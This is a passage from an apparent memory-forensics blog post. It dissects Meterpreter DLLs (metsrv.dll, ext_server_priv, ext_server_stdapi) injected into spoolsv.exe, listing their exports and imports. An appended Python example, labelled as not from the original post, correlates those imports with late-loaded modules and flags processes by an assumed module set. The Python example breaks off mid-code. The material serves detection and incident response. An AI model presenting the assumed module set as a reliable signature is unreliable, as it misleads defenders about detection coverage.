text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; 
word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Of these, </font><font face="courier">WINHTTP.dll</font><font face="inherit"> and </font><font face="courier">WININET.dll</font><font face="inherit"> both appear in the list of dlls loaded late into </font><font face="courier">spoolsv.exe</font><font face="inherit">.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">What of the others? 
Let's check the other dumps.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xf093d40000.dmp 0</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">timestamp: 2017-03-17T17:57:34+00:00</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">checksum: 0x12beb5</span></p><p 
class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">export name: </font><font color="#04ff00">metsrv.dll</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">exports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>0) Init</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space" style="color: #f4f4f4;"> </span><font color="#f4f4f4">1) </font><font color="#04ff00">ReflectiveLoader</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imphash: 5df789b340bdc9056bbdeb6485e684b1</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">This dump matches the other and gives us no new information. 
Next:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xf093650000.dmp 0</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">timestamp: 2017-03-17T17:57:37+00:00</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">checksum: 0x21c86</span></p><p class="p1" style="background-color: 
rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">export name: </font><font color="#04ff00">ext_server_priv.x64.dll</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">exports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>0) DeinitServerExtension</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1) GetExtensionName</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>2) InitServerExtension</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>3) ReflectiveLoader</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>4) control</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- PSAPI.DLL.GetModuleBaseNameA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- PSAPI.DLL.EnumProcesses</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span 
class="Apple-converted-space"> </span>- KERNEL32.dll.WaitForSingleObject...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.DuplicateToken...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imphash: ffef24858578d3574c5d32e8809de379</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; 
font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Above, with much redacted for the sake of space, we have a few more bits of information: the name of another injected dll, </font><font face="courier">ext_server_priv.x64.dll</font><font face="inherit">, and a new imported dll, </font><font face="courier">PSAPI.DLL</font><font face="inherit">, which also appears in the list of dlls loaded late into spoolsv.exe.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Let's dump the last one:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; 
text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xf093c70000.dmp 0</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">timestamp: 2017-03-17T17:57:53+00:00</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">checksum: 0x6fb3b</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font 
color="#f4f4f4">export name: </font><font color="#04ff00">ext_server_stdapi.x64.dll</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">exports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>0) DeinitServerExtension</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1) GetExtensionName</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>2) InitServerExtension</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>3) ReflectiveLoader</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 
0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- PSAPI.DLL.GetDeviceDriverBaseNameW...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="Apple-converted-space" style="font-variant-ligatures: no-common-ligatures;"> </span><span style="font-variant-ligatures: no-common-ligatures;">- WINMM.dll.waveInAddBuffer...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="Apple-converted-space" style="font-variant-ligatures: no-common-ligatures;"> </span><span style="font-variant-ligatures: no-common-ligatures;">- IPHLPAPI.DLL.GetIpNetTable...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- SHLWAPI.dll.SHDeleteKeyW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; 
font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.accept...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleFileNameA...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"> </span><span class="Apple-converted-space" style="font-variant-ligatures: no-common-ligatures;"> </span><span style="font-variant-ligatures: no-common-ligatures;">- USER32.dll.SwitchDesktop...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.ImpersonateLoggedOnUser...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- 
ole32.dll.CoCreateInstance...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="Apple-converted-space" style="font-variant-ligatures: no-common-ligatures;"> </span><span style="font-variant-ligatures: no-common-ligatures;">- OLEAUT32.dll.VariantClear...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="Apple-converted-space" style="font-variant-ligatures: no-common-ligatures;"> </span><span style="font-variant-ligatures: no-common-ligatures;">- MPR.dll.WNetGetUniversalNameA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- NETAPI32.dll.NetWkstaGetInfo</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">sections:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .text...</span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imphash: 204d5fb9d32a5334c03d70887f17e301</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Another new dll, </font><font face="courier">ext_server_stdapi.x64.dll</font><font face="inherit"> along with its exports and a redacted list of imports. 
These imports nearly round out the list of dlls loaded late into </font><font face="courier">spoolsv.exe</font><font face="inherit">; I believe only </font><font face="courier">wkscli.dll</font><font face="inherit"> is missing.</font></span></div><h2 style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">What are the takeaways?</font></span></h2><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Attackers are crafty and have been for a long time. This post presents the visible part of the iceberg. There are <a href="https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" target="_blank">other ways to inject</a> malicious code into legitimate processes. Some of these may not lend themselves to easy discovery; some may. 
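The correlation done by hand above (pull the dll names out of each injected PE's imports, set them against the modules that loaded late into spoolsv.exe, and note what is left over), written out as an added Python example. This is not code from the original post, from memdumppe.py, Volatility or Kansa. The memdumppe-style listing, the late-loaded module list and the process snapshot below are constructed samples, and the module set used by the closing hunt check is an assumption drawn from that overlap, not a vetted signature.

```python
"""Added example: correlate an injected PE's imports with a host process's
late-loaded modules, then flag processes carrying a chosen module set.
Not code from the original post, memdumppe.py, Volatility or Kansa."""
import re
from collections import defaultdict

# Constructed sample in the shape of memdumppe.py output for the stdapi
# extension; function names are abbreviated with "..." as in the post.
STDAPI_DUMP = """\
export name: ext_server_stdapi.x64.dll
exports:
 0) DeinitServerExtension
 1) GetExtensionName
 2) InitServerExtension
 3) ReflectiveLoader
imports:
 - PSAPI.DLL.GetDeviceDriverBaseNameW...
 - WINMM.dll.waveInAddBuffer...
 - IPHLPAPI.DLL.GetIpNetTable...
 - SHLWAPI.dll.SHDeleteKeyW
 - WS2_32.dll.accept...
 - KERNEL32.dll.GetModuleFileNameA...
 - USER32.dll.SwitchDesktop...
 - ADVAPI32.dll.ImpersonateLoggedOnUser...
 - ole32.dll.CoCreateInstance...
 - OLEAUT32.dll.VariantClear...
 - MPR.dll.WNetGetUniversalNameA
 - NETAPI32.dll.NetWkstaGetInfo
sections:
 - .text...
imphash: 204d5fb9d32a5334c03d70887f17e301
"""

# Assumed list of modules that loaded into spoolsv.exe well after process
# start, as a dlllist/ldrmodules-style listing with load times would show.
# Constructed for this example; not the list from the original post.
LATE_LOADED_SPOOLSV = [
    "WINHTTP.dll", "WININET.dll", "PSAPI.DLL", "WINMM.dll", "IPHLPAPI.DLL",
    "SHLWAPI.dll", "ole32.dll", "OLEAUT32.dll", "MPR.dll", "NETAPI32.dll",
    "wkscli.dll",
]

# Matches "- DLLNAME.dll.FunctionName" lines; a trailing "..." from
# redaction is dropped from the function name.
IMPORT_RE = re.compile(r"^\s*-\s*(\S+?\.dll)\.(\S+?)\.*$", re.IGNORECASE)


def parse_memdumppe(text):
    """Return (export_name, {dll_lower: [function, ...]}) from a listing."""
    export_name = None
    imports = defaultdict(list)
    for line in text.splitlines():
        if line.startswith("export name:"):
            export_name = line.split(":", 1)[1].strip()
            continue
        m = IMPORT_RE.match(line)
        if m:
            imports[m.group(1).lower()].append(m.group(2))
    return export_name, dict(imports)


def imported_dlls(text):
    """The distinct DLL names an injected PE imports, lower-cased."""
    return set(parse_memdumppe(text)[1])


def late_loaded_overlap(text, late_loaded):
    """DLLs the PE imports that also loaded late into the host process."""
    late = {d.lower() for d in late_loaded}
    return sorted(imported_dlls(text) & late)


def unexplained_late_loads(texts, late_loaded):
    """Late-loaded modules that no dumped PE's imports account for."""
    explained = set().union(*(imported_dlls(t) for t in texts))
    return sorted(d for d in late_loaded if d.lower() not in explained)


# Hunt-style check in the spirit of Kansa's Get-ProcessesUsingModules: flag
# any process whose loaded modules include every name in `wanted`. This set
# is an assumption drawn from the overlap above, not a vetted signature.
MIGRATION_MODULES = {"winhttp.dll", "wininet.dll", "psapi.dll",
                     "winmm.dll", "iphlpapi.dll"}


def processes_with_modules(process_modules, wanted=MIGRATION_MODULES):
    """process_modules: {pid: (image_name, [module names])}.
    Returns sorted [(pid, image_name)] for processes loading all of `wanted`."""
    hits = []
    for pid, (image, modules) in process_modules.items():
        if wanted <= {m.lower() for m in modules}:
            hits.append((pid, image))
    return sorted(hits)


# Constructed process/module snapshot: spoolsv.exe after a migration plus
# two ordinary processes that share some, but not all, of the modules.
SAMPLE_PROCESSES = {
    1412: ("spoolsv.exe", ["ntdll.dll", "KERNEL32.dll", "winspool.drv",
                           "WINHTTP.dll", "WININET.dll", "PSAPI.DLL",
                           "WINMM.dll", "IPHLPAPI.DLL", "WS2_32.dll"]),
    2228: ("explorer.exe", ["ntdll.dll", "KERNEL32.dll", "WINHTTP.dll",
                            "WININET.dll", "PSAPI.DLL", "IPHLPAPI.DLL"]),
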